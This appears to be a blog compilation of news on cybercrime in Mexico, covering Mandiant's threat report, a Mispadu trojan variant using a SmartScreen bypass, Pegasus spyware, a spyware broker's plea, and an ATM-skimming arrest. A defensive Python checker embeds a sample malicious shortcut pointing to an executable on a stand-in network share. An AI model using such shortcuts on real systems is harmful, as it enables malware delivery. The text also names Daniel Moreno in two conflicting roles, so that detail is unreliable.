
Here's How Criminals Are Targeting Users and Enterprises in Mexico


A recent Mandiant report highlighted the increasing cyber threats that Mexico is facing, including a sophisticated blend of domestic and global cybercrime that targets both individuals and businesses. 

Mexico's economy, the 12th largest in the world, makes the country an appealing target both for financially motivated criminals and for state-sponsored actors from countries such as North Korea, China, and Russia.

Since 2020, cyber espionage groups from more than ten nations have been observed attempting to breach Mexican organisations. Among these, actors affiliated with the People's Republic of China (PRC), North Korea, and Russia have been the most active, with PRC-linked groups accounting for one-third of the observed government-sponsored phishing activity.

Chinese actors are focusing specifically on news, education, and government organisations in Mexico; this is consistent with the targeting observed in other regions where China has made large investments.

Since the start of the war in Ukraine, North Korean outfits have focused on financial technology and cryptocurrency firms, while Russian cyber espionage activities have fallen substantially as resources have been diverted to other areas. The use of commercial spyware in Mexico is also highlighted in the report, with politicians, human rights advocates, and journalists being among the targets.

These tools are sold primarily to governments and work by exploiting vulnerabilities in consumer devices such as smartphones. While each spyware deployment affects only a small number of people, the targets are chosen for their political or journalistic work, so the campaigns have outsized implications for Mexico's press freedom and political integrity.

Mandiant's report highlights a significant increase in ransomware and extortion operations in Mexico. From January 2023 to July 2024, Mexico ranked second in Latin America in terms of data leak site (DLS) listings following ransomware attacks, trailing only Brazil. LockBit, ALPHV, and 8BASE have been the most active in Mexico, concentrating on industries including manufacturing, technology, and financial services.

Financial malware distribution campaigns also persist in Mexico, with attackers using tax- and finance-themed lures to trick victims into downloading malicious software. UNC4984 and other groups have been seen distributing malware that targets Mexican banks via spoofed Mexican government websites, including sites impersonating the Mexican Tax Administration Service (SAT).

New Variant of Banking Trojan Discovered Targeting Mexico

Cybersecurity researchers from Palo Alto Networks Unit 42 have uncovered a new variant of the stealthy banking Trojan known as Mispadu Stealer. This infostealer is specifically designed to activate only for regions and URLs associated with Mexico, posing a significant threat to users in the country.

The researchers came across the new variant while investigating attacks that exploit the Windows SmartScreen bypass vulnerability CVE-2023-36025. The flaw has been a popular choice for cybercriminals looking to slip past security warnings and infiltrate systems; Microsoft patched it in November 2023, so fully updated machines are no longer affected.

How the Attack Works

Attackers exploit a flaw in Windows SmartScreen, the security feature that warns users about potentially harmful downloads. By crafting Internet Shortcut files (.URL) or hyperlinks that point to malicious content, they can evade SmartScreen's warning. The evasion hinges on the shortcut's URL parameter pointing to a network share rather than a standard web URL: inside the manipulated .URL file is a link to a share controlled by the threat actor, which hosts the malicious executable, and opening the shortcut fetches and runs that file without the expected SmartScreen prompt.
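To make the evasion tactic concrete, the following is an added example (not code from the original post, from Unit 42, or from any vendor tooling): a small Python checker that parses Internet Shortcut (.URL) files and flags those whose URL parameter points to a network share (a UNC path or a file:// URL with a remote host) instead of a web URL. The sample shortcut contents and the host 203.0.113.10 are constructed for illustration and do not come from any real campaign.

```python
"""Triage Internet Shortcut (.URL) files for network-share targets.

Added example for the SmartScreen bypass described above. A .URL file is a
small INI-style text file; the attacker-controlled variant points its URL
parameter at a share (UNC path or file:// URL with a remote host) so that
the payload is pulled from the share rather than from a web URL.
"""
import configparser
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed samples. The host 203.0.113.10 is a documentation address.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/report
"""

SUSPICIOUS_URL_FILE = r"""[InternetShortcut]
URL=file://203.0.113.10/share/factura.exe
IconIndex=13
IconFile=C:\Windows\System32\SHELL32.dll
"""

# \\host\share\... (also accepts forward-slash variants after the host)
UNC_RE = re.compile(r"^\\\\[^\\/]+[\\/]")
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def shortcut_target(content: str) -> Optional[str]:
    """Return the URL parameter of an [InternetShortcut] section, or None.

    Real files on disk may be UTF-16 or CRLF encoded; decode them before
    passing the text here. strict=False tolerates duplicated keys.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(content)
    except configparser.Error:
        return None
    for section in parser.sections():
        if section.lower() == "internetshortcut":
            # option names are lower-cased by configparser by default
            return parser.get(section, "url", fallback=None)
    return None


def is_network_share_target(url: str) -> bool:
    """True when the target resolves to a remote share rather than a web URL."""
    target = url.strip()
    if UNC_RE.match(target):
        return True
    parsed = urlparse(target)
    if parsed.scheme.lower() in {"file", "smb"}:
        # file:///C:/... and file://localhost/... are local, not a share
        return (parsed.hostname or "") not in LOCAL_HOSTS
    return False


def assess_shortcut(content: str) -> dict:
    """Classify one .URL file's text as benign, suspicious, or unparsable."""
    target = shortcut_target(content)
    if target is None:
        return {"target": None, "verdict": "unparsable"}
    verdict = "suspicious" if is_network_share_target(target) else "benign"
    return {"target": target, "verdict": verdict}


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL_FILE),
                         ("suspicious", SUSPICIOUS_URL_FILE)):
        print(name, assess_shortcut(sample))
```

The check is a triage heuristic rather than a full detection: it looks only at the URL parameter, so anything with a file:// or UNC target inside an e-mail attachment or archive merits quarantine and closer inspection, while a web URL still needs the usual reputation checks.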

Since August 2022, Mispadu has been behind numerous spam campaigns, resulting in the theft of over 90,000 bank account credentials. This revelation highlights the significant threat Mispadu poses to the financial security of users across Latin America. However, Mispadu is just one member of a larger family of LATAM banking malware. 

Among its notorious counterparts is Grandoreiro, a formidable threat that has plagued users in the region. Recent efforts by law enforcement authorities in Brazil have resulted in the dismantling of Grandoreiro, offering some relief to users. 

Despite this success, researchers warn that the danger from Mispadu and similar malware persists. Users should treat unsolicited e-mails and their attachments with suspicion, keep Windows fully patched so that the SmartScreen bypass no longer applies, and avoid opening shortcut files from untrusted sources.

Report: Mexico Continued to Utilize Spyware Against Activists


Despite President Andrés Manuel López Obrador's pledge to end such practices, the Mexican government or army is said to have continued to use spyware designed to hack into activists' cellphones. 

Press freedom groups say they found evidence of recent attempts to use the Israeli spyware programme Pegasus against activists investigating human rights violations by the Mexican army. A forensic investigation by the University of Toronto's Citizen Lab confirmed the Pegasus infections.

The targets included the rights activist Raymundo Ramos, according to a report by the press freedom group Article 19, the Network for the Defense of Digital Rights, and Mexican media organisations. Ramos has spent years documenting military and police abuses, including multiple killings, in Nuevo Laredo, a drug cartel-dominated border city. In 2020, Ramos' cellphone was reportedly infected with Pegasus spyware.

“They do not like us documenting these types of cases, for them to be made public and have criminal complaints filed,” Ramos said.

Other victims in 2019 and 2020 included journalist and author Ricardo Raphael and an unnamed journalist for the online media outlet Animal Politico. 

According to Daniel Moreno, director of Animal Politico, "If the president didn't know, that is very serious because it means the army was spying on him without his consent. If the president was aware, it would be extremely serious."

López Obrador took office in December 2018 with the promise of ending government spying. The president has said that as an opposition leader he was himself subjected to government surveillance for decades. In 2019, in response to questions about the use of Pegasus, López Obrador said, "We are not involved in that. Here we have decided not to go after anybody. Before, when we were in the opposition, we were spied on."

According to the report, the Mexican army requested price quotes for surveillance programmes from companies involved in the distribution of Pegasus, which its maker says is sold only to governments. The hacker group Guacamaya obtained army documents containing requests for price quotes from 2020, 2021, and 2022.

Because of the nature of their work and the timing of the espionage, the victims of the spyware attacks assumed the military was to blame. Leopoldo Maldonado, the director of Article 19, stated, “All of this indicates two possible scenarios: the first, that the president lied to the people of Mexico. The second is that the armed forces are spying behind the president’s back, disobeying the orders of their commander in chief.”

When reached for comment, a spokesman for Mexico's Defense Department said there was no immediate response to the allegations. In 2021, a Mexican businessman was arrested on suspicion of spying on a journalist with Pegasus, but the Israeli spyware firm NSO Group distanced itself from him. In Mexico, the businessman has long been described as an employee of a company that acted as an intermediary in spyware purchases.

According to López Obrador's top security official, two previous administrations spent $61 million on Pegasus spyware. The NSO Group has been linked to government surveillance of political opponents and journalists all over the world. 

"NSO's technologies are only sold to vetted and approved government entities," as per the company.

Mexico accounted for the largest share, approximately 15,000 phone numbers, of the more than 50,000 numbers reportedly selected for potential surveillance by NSO clients.

López Obrador has relied on the military more and given it more responsibilities than any of his predecessors, from building infrastructure to overseeing seaports and airports. This has sparked concern that the Mexican army, which has traditionally avoided politics, is becoming a force unto itself, with little oversight or transparency.

Malware Seller Faces Charges for Peddling WhatsApp Espionage Tools


The US Justice Department (DoJ) reported that a Mexican businessman named Carlos Guerrero pleaded guilty in federal court to selling spyware and hacking tools to clients in the United States and Mexico.

Prosecutors said Guerrero facilitated the sale of monitoring and surveillance technologies to both Mexican government users and private customers for commercial and personal purposes. According to the investigators, Guerrero "knowingly arranged" for a Mexican mayor to obtain access to a political rival's e-mail and social media accounts. Guerrero also used the technology to intercept the phone calls of a US-based business rival who was in Southern California and Mexico at the time.

According to the Department of Justice's news release, Guerrero helped the mayor gain unlawful access to the rival's iCloud, Hotmail, and Twitter accounts. In another case, a sales representative's phone and e-mail data were accessed, and he had to pay $25,000 to regain the information. Guerrero's company, Elite by Carga, imported surveillance technology and espionage tools from unnamed Israeli, Italian, and other companies.

Guerrero acted as a broker for an undisclosed Italian business, referred to only as Company A in the charging documents, which offered bugging devices and tracking tools between 2014 and 2015. The company is believed to be Hacking Team, the now-bankrupt Milan-based maker of offensive intrusion tools that was itself breached in 2015 and had its e-mails leaked online, including a cache of messages relating to Guerrero.

Pegasus, the powerful mobile spyware created by the Israeli company NSO Group, which can obtain near-complete control of a target's smartphone, is among the most widely reported spyware used in Mexico. Over the last two decades, Mexico has spent $61 million on Pegasus contracts, and the tool has primarily been used against journalists, activists, and human rights defenders. According to a leaked list of phone numbers suspected to be NSO surveillance targets, Mexico accounts for the most targets of any country on the list; NSO has consistently denied the list's significance.

Guerrero's information director, Daniel Moreno, who is mentioned often in the Hacking Team e-mails, is expected to enter a similar plea in the coming weeks.

Florian Tudor – The Shark Arrested in Mexico


Florian Tudor, "The Shark," the alleged mastermind of a notorious ATM skimming gang, was detained in Mexico City on Thursday, 27 May 2021, at the request of a Romanian court. His gang is alleged to have siphoned hundreds of millions of dollars from the bank accounts of tourists visiting Mexico over the past eight years.

Tudor, from Craiova, Romania, travelled to Mexico to establish Intacash and Top Life Servicios, ATM services companies that operated a network of comparatively new ATMs in Mexico.

On Thursday, Tudor was taken into custody by officers of Mexico's Attorney General. As shown in a video published by media organisations, the arrest descended into a scuffle, with shouting and officials carrying Tudor out of the house by his arms and legs.

Mexico's federal law enforcement agency alleged that members of Tudor's group tried to attack a police officer before they were arrested.

Robert Bica, Tudor's lawyer in Bucharest, confirmed his detention to the Romanian newspaper Libertatea. A Mexican judge is expected to decide on his extradition within the next two or three weeks.

A source within Romania's organised crime prosecution office told the same publication that United States authorities played an important role in investigating Tudor, who is said to have targeted thousands of US tourists in Mexico and is considered responsible for approximately 12% of global skimming.

The arrest is the latest twist in a long history of investigations by law enforcement officers and foreign journalists into Tudor and his Riviera Maya Gang.

The gang, so named by the Organized Crime and Corruption Reporting Project (OCCRP), compromised more than 100 ATMs around Mexico, in Cancun, Tulum, Cozumel, and elsewhere, to quietly drain an estimated $1.2 billion from victims' bank accounts, according to OCCRP. The scheme relied in part on Bluetooth skimmers that were implanted inside the ATMs by bank technicians who were paid for the service.

Last year a Romanian court issued an arrest warrant for Tudor on charges of attempted murder, blackmail, and running an organised crime network specialising in human trafficking, following his conviction in absentia.

Tudor has also been investigated by the Bucharest authorities over the trafficking of thousands of Romanians of Roma origin to Mexico and the United States, where they are reportedly made to steal, beg, and claim asylum on the grounds of fleeing racial persecution in Romania.

Over the years, Mexican authorities have examined Tudor's and his companies' bank accounts, and investigators believe that Tudor and his associates paid protection and hush money to various Mexican politicians and officials. The leader of Mexico's Green Party stepped down in February when it emerged that he had been receiving cash from Tudor.

This is the second time the Mexican authorities have arrested Tudor. Tudor and his subordinates were arrested in April 2019 for illegal firearms possession. That arrest came only months after a former bodyguard had reportedly begun assisting US officials in their effort to bring down the gang's lucrative skimming operation.